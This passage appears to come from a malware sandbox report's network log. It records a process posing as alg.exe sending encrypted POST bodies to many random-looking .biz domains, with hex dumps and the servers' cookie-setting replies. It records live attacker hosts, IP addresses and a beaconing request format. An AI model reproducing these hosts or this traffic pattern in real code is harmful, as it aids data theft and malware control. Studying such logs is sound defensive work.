                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.189726114 CET834OUTData Raw: de 6b da fb 3a c4 c2 a5 36 03 00 00 21 6e be bb 6a fb 8c 5b 28 f4 5f b0 80 2f 18 9b ec 67 e8 70 40 b2 a8 06 77 f1 b9 22 e2 3f 32 14 0e 47 c7 25 8d b3 f4 f5 78 84 18 aa db 13 a6 b7 58 de 20 f4 c2 e9 fc 98 70 49 be fb 50 41 de b3 5d 61 36 c5 c8 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k:6!nj[(_/gp@w"?2G%xX pIPA]a6OsikKvf)|M(jU-,yer).E"18UiU2n]oo.H?.J#d5GB%}*C*YX;`+4[)7


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        53192.168.2.105003244.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.821702003 CET357OUTPOST /hppmgsitpcfjw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.821743011 CET778OUTData Raw: 4d 46 4c 17 11 42 c0 c9 fe 02 00 00 80 8d c2 c1 1e e6 c1 97 59 75 ca f4 76 b0 7b 6b 1d 50 18 08 3f a8 d0 2b 8c 24 68 fd 9d 94 ab 49 d9 9a 58 2b 92 ae 86 65 55 83 7c 0b 66 73 d9 06 c5 4a 7f f2 77 53 03 38 af 55 ec d6 54 af 56 be b5 a0 5a 19 80 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MFLBYuv{kP?+$hIX+eU|fsJwS8UTVZ\]D}X:c/E.-dt;22p|>uRdLw:=mPObbi2ZNV4]p$NKbG\v2J|.5):PRVgb>
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.482261896 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=54a923f0651cf0c7a0e17e320bcd1da5|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        54192.168.2.105003318.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.399964094 CET359OUTPOST /ggbuhmxfarcrplg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.399991035 CET778OUTData Raw: b6 8a c0 bb e5 41 10 aa fe 02 00 00 52 ad 44 79 7a 37 b4 c2 79 d7 53 5e 8a 5f 56 0f 04 dc d6 6a 62 a5 21 a9 3d 01 a5 99 27 40 3b 85 a2 c5 85 ee a6 6a ea 88 fe 09 63 7c e3 ca e7 b8 a7 56 c4 6a ff f5 fd a6 39 99 4b e1 8f ee f2 93 a0 09 73 68 4d 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ARDyz7yS^_Vjb!='@;jc|Vj9KshMJ6(`Q$-|XP-hG!"?RVAIFQG>gFD*H>.q{2n)"Rb;& %q*~F(6B;h=g1d7Z@x*ElH$t\%(
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.852495909 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5f3d665833ea710de10ec82bcb3034ff|155.94.241.187|1731920322|1731920322|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        55192.168.2.105003418.246.231.120807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.006525040 CET343OUTPOST /cl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.006525040 CET778OUTData Raw: 19 88 6a a6 fb cd 13 7e fe 02 00 00 6c 10 3a 9d 3a ba ce 66 5f 96 8a e1 4a 8c 35 1e c8 ab fd b5 2a d6 d7 60 aa fd a3 99 0b a7 60 44 e4 a5 a3 3f dc 87 8d c0 9d ef ff be 96 3c 82 09 cf ed 6b 61 0a e3 26 61 af ec d3 1a a3 8b 57 90 e7 9e 67 1e 25 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: j~l::f_J5*``D?<ka&aWg%og$r|DMv6i'*<*bgqrbs8~F}5fd]>:wI&ff[W*=d}d1vq*8_8Cg^j|+=@h}@w_R
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.837762117 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7c71ac157bb27d44212de8acb8c7b25c|155.94.241.187|1731920324|1731920324|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        56192.168.2.105003518.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.989088058 CET358OUTPOST /vommasbpmwjrwo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.989120007 CET778OUTData Raw: a6 b8 d2 03 a0 2c 8f c7 fe 02 00 00 a5 05 f1 44 84 3a ad f3 b2 d8 5e a0 2a e6 48 7e de f7 82 6d a6 c5 d7 38 7f 2f 2f b6 84 55 15 f1 15 74 a9 e7 43 a3 4e 85 3c bc 23 e5 91 6d 18 99 fe 93 87 fc 58 c0 48 95 86 43 f2 6b 10 98 09 c3 f6 a8 aa b9 87 72
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,D:^*H~m8//UtCN<#mXHCkr0B[@P DHma948LzNK\zvt5cKMvuH!F%tm.oS7e2n\U3|W|(OK&$QyIsa9U/['f:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.656181097 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1555a8d4c0ac5a674394a1862f4c4173|155.94.241.187|1731920325|1731920325|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        57192.168.2.105003613.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.993643045 CET353OUTPOST /joygyaofiuw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.993643045 CET778OUTData Raw: 2f 47 33 08 2d 80 32 4c fe 02 00 00 52 25 6c 16 c1 39 7b f2 15 f3 58 73 21 d1 a5 6f dc b0 6a e3 31 2e 4f d1 f5 5f 0b 15 99 ea d1 33 b1 f8 40 f0 23 bf 1c e6 dd 64 0f b4 98 32 41 71 f7 26 4e f0 e5 21 5b d2 4f e5 15 e4 eb 98 ad b9 fe 20 26 92 78 da
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /G3-2LR%l9{Xs!oj1.O_3@#d2Aq&N![O &x=LaWV9v%?,9HY;2_36XP!)nMZT6"GXcar{ooCfv^MMN+}:)0Zbf-Am/T;Dm>#]e>:'hHu[
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.446366072 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1f07995ed8081ebaeffeab07148c6183|155.94.241.187|1731920327|1731920327|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        58192.168.2.105003713.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.611001015 CET360OUTPOST /jvdwdelnnjmgtxf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.611001015 CET778OUTData Raw: 01 18 ac 97 53 57 91 45 fe 02 00 00 bb 51 65 77 4d 78 23 93 f0 2e 10 b6 f3 3b b2 96 d8 8a 4c b8 be 8a 49 68 82 31 53 d5 c9 90 d6 c3 0f 11 44 50 dd 59 dd d6 2a 49 21 da a2 b7 da 9b ce bb 54 dd 8b 70 5f 2d 78 2f 7a 45 96 1c ba 25 d8 4b fc d1 97 8d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: SWEQewMx#.;LIh1SDPY*I!Tp_-x/zE%KhGh^sK|U\&P4aZ$%Kt#><A(DEWs:Qa{-S"d8c~?I+^6P;\@~ +iv~G
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.055046082 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=89ce539a81ccdf7c72a0585ecbdbdd7d|155.94.241.187|1731920328|1731920328|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        59192.168.2.105003882.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.688400984 CET357OUTPOST /mhdtcntnalxh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.688426018 CET834OUTData Raw: 4b 19 2b 32 55 78 dc f9 36 03 00 00 08 8d a2 a1 03 6f 30 12 32 92 09 86 52 2f cf d9 b0 e5 41 dd 2b 5c 4b 12 a2 41 b3 03 26 01 83 01 c6 73 00 6b fd 19 8a 99 e6 d2 31 d1 2f 44 2e 5d 03 01 2f 5c 24 48 ba 0a 1e 0b e2 0f 00 cd 39 53 e6 47 5f 51 1e 98
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K+2Ux6o02R/A+\KA&sk1/D.]/\$H9SG_Q?XJq2H%qKC_)+K.f)7l^c7R \8wGCn9M!A1[0Q{^6q6V-Q0glv)rPtl0AK_eq?s<{ze-


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        60192.168.2.105003934.211.97.45807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.313756943 CET353OUTPOST /kgdhcykbe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.313783884 CET778OUTData Raw: 6c 40 e5 05 2a 1a 5d d0 fe 02 00 00 71 34 a5 8a ea 93 b7 21 28 69 ac 77 0c 1a b9 e3 06 fa e1 2c 0c ae 00 80 3e 77 cd 45 c5 5c 3f 6a 57 c2 4a 13 19 bc 82 d0 56 cc c3 24 66 ef fc c4 34 7a d5 f8 ad 6c 54 f2 58 8f 3b 96 1e 17 ea 71 c0 c2 e3 c5 ac 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l@*]q4!(iw,>wE\?jWJV$f4zlTX;q\J$plG?b]=jk>>:y{_abnJ$@J+B|3}S<vPmvx5{#f>"FHMb4wj[9.Gbx?
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.149583101 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3186e82f79967e55dca774423507d7a4|155.94.241.187|1731920330|1731920330|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        61192.168.2.105004047.129.31.212807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.363857031 CET358OUTPOST /efnfkaqjisfwrsut HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.363871098 CET778OUTData Raw: 78 86 2b 00 a2 0b d4 98 fe 02 00 00 4c 86 77 22 24 06 dc 27 b3 81 82 8e d5 40 5a 15 7e 84 0f 89 07 4a 05 15 f3 72 74 db 40 25 f2 b4 72 86 52 15 09 9a 58 41 b8 90 f5 38 d5 3b 35 b2 f5 d9 77 44 55 db 56 be 90 62 e6 c6 9d b4 a7 4a 0c 39 a2 f1 48 a6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x+Lw"$'@Z~Jrt@%rRXA8;5wDUVbJ9H&mKF/<tp9Un4hAPM;8{pe]tV&ju?mr?%a9x1dih1A~4Cvu0=e`&{H0B#q7e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:51.847472906 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b270e253720c65eada9e4be610a76733|155.94.241.187|1731920331|1731920331|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        62192.168.2.105004113.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:52.218781948 CET345OUTPOST /xr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:52.218807936 CET778OUTData Raw: 7a 09 5c 4f df 64 e5 25 fe 02 00 00 77 35 78 12 74 89 d2 1b 0d 09 54 18 f4 69 d8 27 1d 5c 1f 7a 92 eb ce 5c ad f3 6b e9 ae b5 0d 6e f4 4b f0 7e ac 4a a2 24 8f 9b 52 68 b0 67 d4 74 0a 37 35 63 25 f6 f4 e0 8a 83 ed c3 2f 76 32 23 a2 c4 e6 69 d0 24
